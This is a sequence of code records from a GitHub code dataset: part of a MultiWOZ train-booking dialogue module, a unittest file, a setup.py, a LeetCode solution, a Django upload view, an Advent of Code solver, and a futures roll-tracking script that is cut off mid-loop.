NL Maybe try another day or length of stay?', self)\n\n def collect_state(self):\n if self.result != self:\n self.res.collect_state()\n else:\n self.inputs['train'].collect_state()\n self.inputs['book_info'].collect_state()\n\n def get_opts(self):\n opts = []\n for i in ['train', 'book_info']:\n if i in self.inputs:\n opts += self.input_view(i).gen_field_opts('BookTrain')\n return opts\n\n def add_slot_noise(self, opts, noise=0):\n if noise>0:\n opts = [o if random.random() > noise else\n TrainBookInfo.get_alternative_opt_value(Train.get_alternative_opt_value(o)) for o in opts]\n return opts\n\n def gen_user(self, target, context, node_map, persona, tried=None):\n # using the convention:\n # if calling for the first time (before the current BookTrain even exists), then\n # self is actually target, and target is given as None\n tried = tried if tried else []\n curr_exists = target is not None\n targ = target if curr_exists else self\n ctx = self.context\n if EXTRACT_SIMP:\n rest = self.input_view('train')\n # 1. we may ask a question about the train\n if curr_exists and (random.random()3:\n x=1\n if len(sel_opts)>0:\n txt += ', '.join([j for (i,j) in sel_opts])\n return pexp, txt, None, False\n return '', '', None, False\n\n # base function - generate text of user request for input inp given target node\n def gen_user_text(self, target, inp):\n # should always be customized!\n v = target.input_view(inp)\n if v:\n return 'I want %s to be %s' % (inp, v.describe().text)\n return 'grrr...'\n\n def compare_task(self, other):\n crest, cbook = self.get_input_views(['train', 'book_info'])\n orest, obook = other.get_input_views(['train', 'book_info'])\n if crest.typename() == 'Train' and cbook.typename() == 'TrainBookInfo':\n if orest.typename() == 'Train' and obook.typename() == 'TrainBookInfo':\n if crest.compare_graphs(orest) and cbook.compare_graphs(obook):\n return True\n return False\n\n\nclass FindTrain(Node):\n def __init__(self):\n super().__init__(Train)\n self.signature.add_sig(posname(1), Train, alias='train')\n\n # arriveby and leaveat actually mean arrive<=T, depart>=T, so even if we already gave\n # a specific time for either, we still get objects with different values for the field!\n def fix_dfields(self, dfields):\n trn = self.input_view('train')\n exc = []\n if trn and trn.typename()=='Train' and trn.constraint_level==1:\n for f in ['leaveat', 'arriveby']:\n if f in trn.inputs:\n exc.append(f)\n return {f:dfields[f] for f in dfields if f not in exc}\n\n def exec(self, all_nodes=None, goals=None):\n context = self.context\n if posname(1) in self.inputs:\n train = self.inputs[posname(1)]\n else:\n train, _ = self.call_construct('Train?()', context)\n train.connect_in_out(posname(1), self)\n\n results = results0 = multiwoz_db.find_elements_that_match(train, train.context)\n nresults = nresults0 = len(results)\n\n # update_mwoz_state(train, context) # initial state from last turn / prev pexp in this turn\n self.filter_and_set_result(results) # initially set result to single result, if single, or don't\n\n inform_fields = defaultdict(list)\n req_fields = {}\n rec_field = None\n sugg = None\n objs = None\n if environment_definitions.agent_oracle:\n dact = context.agent_turn['dialog_act']['dialog_act']\n atext = context.agent_turn['utterance']\n # 1. 
try to understand what the agent did -\n for d in dact:\n dom, typ = d.split('-')\n if dom=='Booking':\n if typ=='Book':\n for [k, v] in dact[d]:\n if k=='name':\n inform_fields['book_name'].append(v)\n elif dom=='Train':\n if typ in ['Inform']:\n for [k, v] in dact[d]:\n inform_fields[k].append(v)\n if typ == 'Request':\n for [k, v] in dact[d]:\n req_fields[k] = v\n\n # for train - recommending by time - either leave or arrive\n if nresults>1:\n for i in ['trainid', 'leaveat', 'arriveby']:\n if not rec_field and i in inform_fields and len(to_list(inform_fields[i]))==1:\n rec_field = i\n\n # TODO - if accepting recommendation from agent for leave/arrive time, the it means that EXACT time,\n # not like the input from user, which is interpreted as LE / GE !\n if rec_field:\n v = inform_fields[rec_field][0]\n r = self.filter_and_set_result(results, rec_field, v, inform_fields)\n if r:\n results = r\n nresults = len(results)\n # results should not be empty - unless the agent made a mistake\n sugg = self.mod_train_field_and_suggest_neg(train, rec_field, v, inform_fields)\n #update_mwoz_state(train, context, inform_fields, req_fields)\n\n if environment_definitions.oracle_only:\n # return the original message of the agent,\n # but may need to change the result according to the agent's action\n #update_mwoz_state(train, context, inform_fields, req_fields)\n raise OracleException(atext, self, suggestions=sugg, objects=objs)\n\n if not environment_definitions.agent_oracle:\n # todo - add logic to recommend first/last train (depending on user request specifying leave or arrive)\n if nresults > 1 and not rec_field:\n dfields = get_diff_fields(results0, ignore_fields=['price']) # 'departure', 'destination', 'leaveat', 'arriveby', 'day'])\n dfields = self.fix_dfields(dfields)\n if len(dfields)>0:\n for f in list(dfields.keys())[:2]:\n req_fields[f] = '?'\n\n org_inform_fields = {i:inform_fields[i] for i in inform_fields}\n if len(inform_fields)>0 or len(req_fields)>0:\n if rec_field and not sugg:\n v = inform_fields[rec_field][0]\n r = self.filter_and_set_result(results, rec_field, v, org_inform_fields)\n results = r if r else results\n nresults = len(results)\n sugg = self.mod_train_field_and_suggest_neg(train, rec_field, v, org_inform_fields)\n\n for f in ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid']:\n if f in inform_fields:\n inform_fields[f] = collect_values(results0, f)\n\n if not rec_field or req_fields:\n if len(req_fields)==0 and not environment_definitions.agent_oracle and nresults>2:\n dfields = get_diff_fields(results, ignore_fields=['departure', 'destination', 'leaveat', 'arriveby', 'day'])\n if dfields:\n req_fields = {i:'?' for i in list(dfields.keys())[:2]}\n\n msg, objs = self.describe_inform_request(nresults0, inform_fields, req_fields, rec_field, org_inform_fields)\n\n #update_mwoz_state(train, context, inform_fields, req_fields) # use inform_fields to update state\n if nresults!=1 or rec_field:\n raise OracleException(msg, self, suggestions=sugg, objects=objs)\n else:\n self.context.add_message(self, msg)\n\n # no inform fields\n #update_mwoz_state(train, context) # update without inform fields\n if nresults == 0:\n raise ElementNotFoundException(\n \"I can not find a matching train in the database. Maybe another area or price range?\", self)\n if nresults > 1:\n objs = list(inform_fields.keys())[:2]\n diffs = ' or '.join(objs)\n if diffs:\n msg = 'Multiple (%d) matches found. Maybe select %s?' 
% (nresults, diffs)\n else:\n msg = 'Multiple (%d) matches found. Can you be more specific?' % nresults\n raise MultipleEntriesSingletonException(msg, self, suggestions=sugg, objects=objs)\n\n # if nresults==1 : success, do nothing\n\n def fallback_search(self, parent, all_nodes=None, goals=None, do_eval=True, params=None):\n top = [g for g in self.context.goals if g.typename()=='MwozConversation']\n if not top:\n top, _ = self.call_construct('MwozConversation()', self.context)\n self.context.add_goal(top)\n else:\n top = top[-1]\n s = '' if posname(1) in self.inputs else 'Train?()'\n d, e = self.call_construct('BookTrain(train=FindTrain(%s), book_info=TrainBookInfo())' % s, self.context)\n if posname(1) in self.inputs:\n find = d.inputs['train']\n self.inputs[posname(1)].connect_in_out(posname(1), find)\n top.add_task(d)\n h = d.inputs['train']\n parent.set_result(h)\n if do_eval:\n e = top.call_eval(add_goal=False)\n if e:\n raise e[0]\n return [h]\n\n # suggest a train with the newly suggested trainid / leaveat / arriveby\n # if reject - restore ALL original values\n def mod_train_field_and_suggest_neg(self, constr, field, v, inform_fields):\n prms = []\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n t = 'TrainID' if i == 'trainid' else 'MWOZTime'\n v = escape_string(inform_fields[i][0])\n old_v = constr.get_dat(i)\n p = '%s=%s(%s)' %(i, t, old_v) if old_v else '%s=Clear()' % t\n prms.append(p)\n d, e = constr.call_construct('%s(%s)' %(t, v), constr.context)\n constr.replace_input(i, d)\n return ['revise(old=Train??(), newMode=overwrite, new=Train?(%s))' % ','.join(prms),\n 'side_task(task=no_op())']\n\n def filter_and_set_result(self, results, field=None, val=None, inform_fields=None):\n if field:\n pp = {}\n rerun_db_search = True\n if rerun_db_search: # we limit the number of results returned from the DB. 
need to run a search again\n train = self.input_view(posname(1))\n if train:\n pp = {i: id_sexp(train.input_view(i)) for i in train.inputs}\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n t = 'TrainID' if i == 'trainid' else 'MWOZTime'\n v = inform_fields[i][0]\n s = '%s(%s)' % (t, escape_string(v))\n pp[i] = s\n\n prms = ['%s=%s' %(i, pp[i]) for i in pp]\n s = 'Train?(%s)' % ','.join(prms)\n print(s)\n f, _ = self.call_construct(s, self.context)\n if rerun_db_search:\n results = multiwoz_db.find_elements_that_match(f, self.context)\n else:\n results = [r for r in results if f.match(r)]\n # for now, we do a hack for time - this is necessary due to the different meanings of time\n # depending on user/agent (solution - return to explicitly using EQ / LE / GE as before)\n for i in ['leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n v = inform_fields[i][0]\n results = [r for r in results if r.get_dat(i)==v]\n if len(results)==1:\n self.set_result(results[0])\n results[0].call_eval(add_goal=False) # not necessary, but adds color\n return results\n\n def describe_inform_request(self, nresults0, inform_fields, req_fields, rec_field, org_inform_fields):\n dep = inform_fields.get('departure')\n dest = inform_fields.get('destination')\n leave = inform_fields.get('leaveat')\n arr = inform_fields.get('arriveby')\n day = inform_fields.get('day')\n dur = inform_fields.get('duration')\n price = inform_fields.get('price')\n tid = inform_fields.get('trainid')\n\n prms = []\n objs = []\n if tid and len(to_list(tid))<3:\n prms.append('I have found ' + and_values_str(tid))\n\n if 'choice' in inform_fields:\n inform_fields['choice'] = [nresults0]\n choice = inform_fields.get('choice')\n if choice:\n prms.append('There are %d matching results' % nresults0)\n elif nresults0 > 1:\n prms.append('I see several (%d) matches' % nresults0)\n\n if dep and len(to_list(dep))<4:\n prms.append('leaving from ' + and_values_str(dep))\n if dest and len(to_list(dest))<4:\n prms.append('going to ' + and_values_str(dest))\n if leave and len(to_list(leave))<3:\n prms.append('leaving at ' + and_values_str(leave))\n if day and len(to_list(day))<3:\n prms.append('on ' + and_values_str(day))\n if arr and len(to_list(arr))<3:\n prms.append('arriving at ' + and_values_str(arr))\n if price and len(to_list(price))<3:\n prms.append('costs ' + and_values_str(price))\n\n if rec_field:\n s = 'I recommend:' + ('' if 'trainid' in org_inform_fields else 'the train ')\n prms.append(s)\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in org_inform_fields:\n v = org_inform_fields[i][0]\n t = 'leaving at ' if i=='leaveat' else 'arriving at ' if i=='arriveby' else ''\n prms.append('%s%s' % (t,v))\n\n # if 'book_name' in inform_fields:\n # prms.append('I Have booked %s' % inform_fields['book_name'][0])\n if len(req_fields) > 0:\n objs = [i for i in req_fields]\n if nresults0 > 0:\n prms.append('maybe select %s' % ' or '.join(objs))\n else:\n prms.append('Sorry, I can\\'t find a match. Try a different %s' % ' or '.join(objs))\n msg = ', '.join(prms)\n return msg, objs\n\n # if we revise a train constraint which already has a train name with a non-name constraint, then drop the name.\n # e.g. user: \"I want to book train X\", Agent: \"train X is ... and has no parking\". 
User: \"I want parking\"\n # also if agent made a suggestion (which was implicitly accepted) - since we don't have explicit RejectSuggestion\n # we need this implicit reject\n def on_duplicate(self, dup_tree=False):\n super().on_duplicate(dup_tree=dup_tree)\n # old = self.dup_of.input_view('train')\n old = self.dup_of.res if self.dup_of.res != self.dup_of else self.dup_of.input_view('train')\n curr = self.input_view('train')\n if 'trainid' in old.inputs and 'trainid' in curr.inputs:\n changed = any([old.get_dat(i)!=curr.get_dat(i) and curr.get_dat(i) is not None\n for i in ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration']])\n if changed:\n curr.disconnect_input('trainid')\n return self\n\n def collect_state(self):\n if self.result!=self:\n self.res.collect_state()\n elif 'train' in self.inputs:\n self.inputs['train'].collect_state()\n\n def gen_field_opts(self, node_name, prms=None):\n i = self.input_view('train')\n return i.gen_field_opts(node_name, prms) if i else []\n\n\nclass revise_train(revise):\n # make it a subtype of revise, so we don't revise this call\n def __init__(self):\n super().__init__()\n # for the hotel\n self.signature.add_sig('departure', Location)\n self.signature.add_sig('destination', Location)\n self.signature.add_sig('leaveat', MWOZTime)\n self.signature.add_sig('arriveby', MWOZTime)\n self.signature.add_sig('day', Book_day)\n # the fields below come from the system\n self.signature.add_sig('duration', Duration)\n self.signature.add_sig('price', Float)\n self.signature.add_sig('trainid', TrainID)\n # book field\n self.signature.add_sig('bookpeople', Book_people)\n\n def valid_input(self): # override the revise valid_input\n pass\n\n def transform_graph(self, top):\n leave, arrive, dur = self.get_input_views(['leaveat', 'arriveby', 'duration'])\n if leave and leave.typename()=='MWOZTime':\n self.wrap_input('leaveat', 'GE(')\n if arrive and arrive.typename()=='MWOZTime':\n self.wrap_input('arriveby', 'LE(')\n if dur and dur.typename()=='Duration':\n self.wrap_input('duration', 'LIKE(')\n return self, None\n\n def exec(self, all_nodes=None, goals=None):\n # 1. raise or create task\n root = do_raise_task(self, 'FindTrain') # the top conversation\n\n # 2. do revise if requested fields given\n train_fields = ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid']\n book_fields = ['bookpeople']\n fields = {'train': [i for i in self.inputs if i in train_fields],\n 'book': [i for i in self.inputs if i in book_fields]}\n for f in fields:\n if fields[f]:\n nodes = root.topological_order(follow_res=False)\n book = [i for i in nodes if i.typename()=='BookTrain']\n if book: # should always be the case\n book = book[0]\n prms = ['%s=%s' % (i, id_sexp(self.inputs[i])) for i in fields[f]]\n # we know exactly what root/old/new should be, so no need to use the search mechanism of the\n # 'revise' node - instead we can directly call duplicate_subgraph to create the revised graph\n if f=='train':\n old = book.inputs['train'].inputs['train']\n s = 'Train?(' + ','.join(prms) + ')'\n else: # book info\n old = book.inputs['book_info']\n s = 'TrainBookInfo(' + ','.join(prms) + ')'\n new, _ = self.call_construct(s, self.context)\n new_subgraph = duplicate_subgraph(root, old, new, 'overwrite', self)\n root = new_subgraph[-1]\n\n self.set_result(root)\n self.context.add_goal(root) # will not add if already added before\n # root.call_eval() # no need to call eval, since eval_res is True. 
is this what we want?\n\n\n# use this node is for debugging - replace the \"proactive\" train recommendation by the agent\n# implement recommendation as a suggestion with implicit accept\nclass suggest_train(Node):\n    def __init__(self):\n        super().__init__()\n        self.signature.add_sig(posname(1), Str)\n\n    def exec(self, all_nodes=None, goals=None):\n        if posname(1) in self.inputs:\n            nm = self.get_dat(posname(1))\n            suggs = ['no_op()',\n                     SUGG_IMPL_AGR + 'revise(old=Train??(), newMode=overwrite, new=Train?(trainid=%s))' % nm]\n            raise OracleException('How about %s?' % nm, self, suggestions=suggs)\n\n\nclass get_train_info(Node):\n    def __init__(self):\n        super().__init__()\n        self.signature.add_sig('train', Train)\n        #self.signature.add_sig('feats', Node)\n        self.signature.add_sig(POS, Str)\n\n    def transform_graph(self, top):\n        pnm, parent = self.get_parent()\n        if parent.typename()!='side_task':\n            if PERSIST_SIDE:\n                parent.wrap_input(pnm, 'side_task(persist=True,task=', do_eval=False)\n            else:\n                parent.wrap_input(pnm, 'side_task(task=', do_eval=False)\n            return parent, None\n        return self, None\n\n    def exec(self, all_nodes=None, goals=None):\n        train = self.input_view('train')\n        if not train:\n            m = get_refer_match(self.context, all_nodes, goals, pos1='Train?()')\n            if m:\n                train = m[0]\n            else:\n                raise MissingValueException('train', self, 'I can give information only after we have selected one train')\n\n        if train:\n            fts = []\n            fts += [self.input_view(i).dat for i in self.inputs if is_pos(i)]\n            if fts:\n                vals = ['the %s is %s' %(i, train.get_dat(i)) for i in fts]\n                msg = 'For %s: ' % train.get_dat('trainid') + ', NL '.join(vals)\n                self.context.add_message(self, msg)\n\n    def yield_msg(self, params=None):\n        msg = self.context.get_node_messages(self)\n        return msg[0] if msg else Message('')\n\n\n################################################################################################################\n\n\ndef extract_find_train(utterance, slots, context, general=None):\n    return extract_find_domain(utterance, slots, context, 'Train', map_train_slots,\n                               TRAIN_PREFIX, ['bookpeople', 'booktime'],\n                               ['departure', 'destination', 'leaveat', 'arriveby',\n                                'day', 'duration', 'price','trainid'],\n                               general)\n\n\n\n\n","repo_name":"telepathylabsai/OpenDF","sub_path":"opendf/applications/multiwoz_2_2/nodes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":39958,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"91"}
+{"seq_id":"16454934287","text":"import unittest\nfrom data_operations import DataOperations\n\nclass TestDataOperations(unittest.TestCase):\n    def setUp(self):\n        # Data for testing standard functionality\n        self.csv_data = [\n            {'user_id': '1', 'date': '01/01/2020', 'quantity': '2,5'},\n            {'user_id': '2', 'date': '02/01/2020', 'quantity': '3,0'},\n            # Add more test data as needed\n        ]\n\n        # Data for testing the new method\n        self.csv_data_for_conditions = [\n            {'Usuário': '1', 'Idade': '30', 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'Date': '01/01/2020', 'Quantity': '2,5'},\n            {'Usuário': '1', 'Idade': '32', 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'Date': '02/01/2020', 'Quantity': '3,0'},\n            {'Usuário': '2', 'Idade': '25', 'Sexo': 'F', 'Farmacêutico': 'B', 'Cenário': 'Y', 'Date': '03/01/2020', 'Quantity': '1,5'},\n            # Additional test data as needed\n        ]\n        self.PDC = {'1': 'PDC1', '2': 'PDC2'}\n\n        # Initialize DataOperations instances for different tests\n        self.data_ops = DataOperations(self.csv_data, 'user_id', 'date', 'quantity', 'age', 'sex', 'pharmacist', 'scenario', self.PDC, 1)\n        self.data_ops_with_conditions = DataOperations(\n            self.csv_data_for_conditions, 'Usuário', 'Date', 'Quantity', 'Idade', 'Sexo', 'Farmacêutico', 'Cenário', self.PDC, 1)\n\n    def test_initialization(self):\n        self.assertEqual(self.data_ops.user_id_col, 'user_id')\n        self.assertEqual(self.data_ops.date_col, 'date')\n        self.assertEqual(self.data_ops.quantity_col, 'quantity')\n        self.assertEqual(self.data_ops.min_dispensations, 1)\n\n    def test_parse_user_id(self):\n        row = {'user_id': '123', 'date': '01/01/2020', 'quantity': '2,5'}\n        self.assertEqual(self.data_ops._parse_user_id(row), '123')\n\n    def test_convert_date(self):\n        self.assertEqual(self.data_ops._convert_date('01/01/2020').isoformat(), '2020-01-01')\n\n    def test_convert_quantity_to_float(self):\n        self.assertEqual(self.data_ops._convert_quantity_to_float('2,5'), 2.5)\n\n    def test_aggregate_records(self):\n        self.data_ops._aggregate_records()\n        self.assertIn('1', self.data_ops._user_medication)\n        self.assertIn('2', self.data_ops._user_medication)\n\n    def test_create_valid_users(self):\n        valid_users = self.data_ops.create_valid_users()\n        self.assertIn('1', valid_users)\n        self.assertIn('2', valid_users)\n\n    def test_process_user_data_with_conditions(self):\n        processed_data = self.data_ops_with_conditions.process_user_data_with_conditions()\n\n        expected_output = [\n            {'Usuário': '1', 'Idade': 32, 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'PDC': 'PDC1'},\n            {'Usuário': '2', 'Idade': 25, 'Sexo': 'F', 'Farmacêutico': 'B', 'Cenário': 'Y', 'PDC': 'PDC2'},\n            # Add expected output for other test scenarios\n        ]\n\n        self.assertEqual(processed_data, expected_output)\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"samuel-marafigo/PDC_calculator","sub_path":"tests/test_data_operations.py","file_name":"test_data_operations.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"43642936443","text":"from setuptools import setup\n\ntests_require = []\n\nsetup(name='accesslog',\n      version='0.7',\n      description='Tool which helps parse access logs into useful blobs.',\n      url='http://github.com/andrewguy9/accesslog',\n      author='andrew thomson',\n      author_email='athomsonguy@gmail.com',\n      license='MIT',\n      packages=['accesslog'],\n      install_requires = [],\n      tests_require=tests_require,\n      extras_require={'test': tests_require},\n      entry_points = {\n          'console_scripts': [\n              'log2dict = accesslog.ui:main'\n          ],\n      },\n      zip_safe=False)\n","repo_name":"andrewguy9/accesslog","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37614842812","text":"class Solution(object):\n    def canFinish(self, numCourses, prerequisites):\n        \"\"\"\n        :type numCourses: int\n        :type prerequisites: List[List[int]]\n        :rtype: bool\n        \"\"\"\n        self.course = [[0] * numCourses for i in range(numCourses)]\n        self.rudu = [0] * numCourses\n        queue = []\n        for pair in prerequisites:\n            self.course[pair[0]][pair[1]] = 1\n            self.rudu[pair[1]] += 1\n        for i in range(numCourses):\n            if self.rudu[i] == 0:\n                queue.append(i)\n        cnt = numCourses\n        while queue:\n            i = queue.pop()\n            cnt -= 1\n            for j in range(numCourses):\n                if self.course[i][j]:\n                    self.rudu[j] -= 1\n                    if self.rudu[j] == 0:\n                        queue.append(j)\n        return cnt == 0\n\n\nprint(Solution().canFinish(3, [[1, 0], [1, 2], [0, 1]]))\n","repo_name":"gtxmobile/leetcode","sub_path":"208. 实现Trie.py","file_name":"208. 实现Trie.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"72310848944","text":"from django import forms\nfrom django.contrib import messages\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom media_manager.models import MediaFile\n\nclass MediaUploadForm(forms.Form):\n    media = forms.FileField(label = 'The media you want to upload')\n\ndef get_model(app_label, model, id):\n    try:\n        model_type = ContentType.objects.get(app_label = app_label, \n                model = model.lower())\n        model = model_type.get_object_for_this_type(id = id)\n\n        return model\n    except ObjectDoesNotExist:\n        raise Http404\n\nclass MediaUpload(View):\n    def post(self, request, **kwargs):\n        form = MediaUploadForm(request.POST, request.FILES)\n        model = get_model(kwargs['app_label'], kwargs['model'], kwargs['id'])\n\n        redir_url = request.GET.get('redir_url', '/')\n        permStr = '{0}.add_media_to_{1}'.format(model._meta.app_label, \n                model.__class__.__name__.lower())\n        \n        if not form.is_valid():\n            messages.warning(request, 'No file to upload')\n        elif not request.user.has_perm(permStr):\n            messages.error(request, 'Missing permissions')\n        else:\n            media = MediaFile(content_object = model,\n                    media = request.FILES['media'], \n                    filename = request.FILES['media'].name)\n            media.save()\n\n            messages.success(request, 'Media uploaded successfully')\n\n        return HttpResponseRedirect(redir_url)\n","repo_name":"Alaxe/judgeSystem","sub_path":"media_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"44361034558","text":"import sys\n\nimport numpy as np\n\n\ndef flood(fld):\n    q = {(0,0,0)}\n    v = lambda fi: all(0 <= i < s for i, s in zip(fi, fld.shape))\n    while q:\n        i, j, k = q.pop()\n        val = fld[i, j, k]\n        for di, dj, dk in ((-1, 0, 0), (1, 0, 0), (0, -1, 0), (0, 1, 0), (0, 0, -1), (0, 0, 1)):\n            fi = (i+di, j+dj, k+dk)\n            if v(fi) and fld[fi] == val:\n                q.add(fi)\n        fld[i, j, k] = 1\n    return fld\n    \n\nif __name__ == \"__main__\":\n\n    indices = []\n    with open(sys.argv[1], 'rt') as input_file:\n        for line in input_file:\n            indices.append([int(v) for v in line.strip().split(',')])\n    indices = np.asarray(indices, dtype=int)\n    xmax, ymax, zmax = indices.max(axis=0)\n\n    grid = np.zeros((xmax+3, ymax+3, zmax+3), dtype=int)\n    grid[indices[:, 0]+1, indices[:, 1]+1, indices[:, 2]+1] = 1\n    faces = np.count_nonzero(np.diff(grid, axis=0)) + \\\n            np.count_nonzero(np.diff(grid, axis=1)) + \\\n            np.count_nonzero(np.diff(grid, axis=2))\n\n    print(\"Non-zero elements: \", np.count_nonzero(grid))\n    print(\"Face count: \", faces)\n\n    filled = flood(grid.copy())\n    filled[filled == 1] = -1\n    filled[filled == 0] = 1\n    filled[filled == -1] = 0\n    grid += filled\n\n    faces = np.count_nonzero(np.diff(grid, axis=0)) + \\\n            np.count_nonzero(np.diff(grid, axis=1)) + \\\n            np.count_nonzero(np.diff(grid, axis=2))\n    print(\"Face count (internal voids excluded): 
faces)\n","repo_name":"michaeluhl/aoc2022","sub_path":"18/problem_18.py","file_name":"problem_18.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25686586576","text":"from fhdataapi import BBG\nimport pandas as pd\nfrom datetime import timedelta\nfrom pandas.tseries.offsets import BDay\nimport matplotlib.pyplot as plt\nimport math\n\ndef get_contracts(d,contract_list,roll_schedule,comm_bbg_code):\n\n month_letter = roll_schedule[d.month-1] if roll_schedule[d.month-1].find('+')==-1 else roll_schedule[d.month-1][0]\n year_int = d.year if roll_schedule[d.month-1].find('+')==-1 else d.year + 1\n contract_rolling_out = comm_bbg_code + month_letter + str(year_int)[-2:] + ' Comdty'\n if contract_rolling_out not in contract_list:\n contract_rolling_out = comm_bbg_code + month_letter + str(year_int)[-1] + ' Comdty'\n\n d2 = d.replace(day=28) + timedelta(days=4)\n month_letter = roll_schedule[d2.month-1] if roll_schedule[d2.month-1].find('+')==-1 else roll_schedule[d2.month-1][0]\n year_int = d2.year if roll_schedule[d2.month-1].find('+')==-1 else d2.year + 1\n contract_rolling_in = comm_bbg_code + month_letter + str(year_int)[-2:] + ' Comdty'\n if contract_rolling_in not in contract_list:\n contract_rolling_in = comm_bbg_code + month_letter + str(year_int)[-1] + ' Comdty'\n\n return contract_rolling_out,contract_rolling_in\n\ndef get_contract_weights(d,calendar,roll_start_bday=5,roll_window_size=5,roll_type='standard'):\n days_in_the_month = [x for x in calendar if x.month == d.month and x.year == d.year]\n if roll_type == 'standard':\n start_idx = roll_start_bday - 1\n end_idx = roll_start_bday + roll_window_size - 2\n roll_start_date = days_in_the_month[start_idx] if len(days_in_the_month) > start_idx else days_in_the_month[-1]\n roll_end_date = days_in_the_month[end_idx] if len(days_in_the_month) > end_idx else days_in_the_month[-1]\n elif roll_type == 'backward_from_month_end':\n roll_start_date = days_in_the_month[roll_start_bday]\n roll_end_date = days_in_the_month[-1]\n\n if d < roll_start_date:\n weight_out = 1\n elif d > roll_end_date:\n weight_out = 0\n else:\n weight_out = float(len([x for x in days_in_the_month if x > d\n and x <= roll_end_date])) / float(roll_window_size)\n\n return [weight_out, 1 - weight_out]\n\nbbg = BBG()\n\n\nstart_date = (pd.to_datetime('2002-01-05') + BDay(1)).date() # for the data\nend_date = pd.to_datetime('today').date()\n\ncomm_bbg_code = 'CL'\nroll_start_bday = 5\nroll_window_size = 5\nroll_schedule = ['H','K','K','N','N','U','U','X','X','F+','F+','H+']\n\nwriter = pd.ExcelWriter(r'G:\\Gustavo Amarante\\Aulas\\df_' + comm_bbg_code + ' v2.xlsx')\n\n# all contracts\ncontract_list = bbg.fetch_futures_list(generic_ticker=comm_bbg_code + '1 Comdty')\n\n# first notice date for the contract\ndf_fn = bbg.fetch_contract_parameter(securities=contract_list, field='FUT_NOTICE_FIRST').sort_values('FUT_NOTICE_FIRST')\ndf_fn.to_excel(writer,'first_notice')\n\n# Grab all contract series\ndf_prices = bbg.fetch_series(securities=contract_list,\n fields='PX_LAST',\n startdate=start_date,\n enddate=end_date)\ndf_prices = df_prices.fillna(method='ffill')\n\ndf_prices.to_excel(writer,'prices')\n\n# sets up the dataframe that will hold our results\nback_start_date = df_prices.loc[df_prices.index[0].replace(day=28) + timedelta(days=4):].index[0] # start on 1st\n # bday of month\ndf_tracker = pd.DataFrame(index=df_prices.loc[back_start_date:].index,\n 
columns=['contract_rolling_out', 'contract_rolling_in',\n 'price_out_today', 'price_in_today','price_out_yst','price_in_yst',\n 'w_out','w_in',\n 'holdings_out','holdings_in',\n 'er_index'])\n\n# initialize\ndf_tracker.loc[back_start_date, 'er_index'] = 100\n\ncontract_rolling_out, contract_rolling_in = get_contracts(back_start_date,df_fn.index,roll_schedule,comm_bbg_code)\nprice_out = df_prices.loc[back_start_date,contract_rolling_out]\nprice_in = df_prices.loc[back_start_date,contract_rolling_in]\ndf_tracker.loc[back_start_date, 'contract_rolling_out'] = contract_rolling_out\ndf_tracker.loc[back_start_date, 'contract_rolling_in'] = contract_rolling_in\ndf_tracker.loc[back_start_date, 'price_out_today'] = price_out\ndf_tracker.loc[back_start_date, 'price_in_today'] = price_in\n\nweights = get_contract_weights(back_start_date,df_prices.index,roll_start_bday=roll_start_bday,roll_window_size=roll_window_size)\ndf_tracker.loc[back_start_date, 'w_out'] = weights[0]\ndf_tracker.loc[back_start_date, 'w_in'] = weights[1]\n\nholdings_out = weights[0]*df_tracker.loc[back_start_date, 'er_index']/price_out\nholdings_in = weights[1]*df_tracker.loc[back_start_date, 'er_index']/price_in\nholdings_out = 0 if math.isnan(holdings_out) else holdings_out\nholdings_in = 0 if math.isnan(holdings_in) else holdings_in\n\ndf_tracker.loc[back_start_date, 'holdings_out'] = holdings_out\ndf_tracker.loc[back_start_date, 'holdings_in'] = holdings_in\n\nfor d, dm1 in zip(df_tracker.index[1:], df_tracker.index[:-1]):\n\n df_tracker.loc[d, 'w_out'] = weights[0]\n df_tracker.loc[d, 'w_in'] = weights[1]\n\n df_tracker.loc[d, 'contract_rolling_out'] = contract_rolling_out\n df_tracker.loc[d, 'contract_rolling_in'] = contract_rolling_in\n\n price_out_d = df_prices[contract_rolling_out].loc[:d].iloc[-1]\n price_out_dm1 = df_prices[contract_rolling_out].loc[:d].iloc[-2]\n price_in_d = df_prices[contract_rolling_in].loc[:d].iloc[-1]\n price_in_dm1 = df_prices[contract_rolling_in].loc[:d].iloc[-2]\n\n df_tracker.loc[d, 'price_out_today'] = price_out_d\n df_tracker.loc[d, 'price_in_today'] = price_in_d\n\n df_tracker.loc[d, 'price_out_yst'] = price_out_dm1\n df_tracker.loc[d, 'price_in_yst'] = price_in_dm1\n\n df_tracker.loc[d, 'holdings_out'] = holdings_out\n df_tracker.loc[d, 'holdings_in'] = holdings_in\n\n if weights[1]==1:\n pnl = holdings_in * (price_in_d - 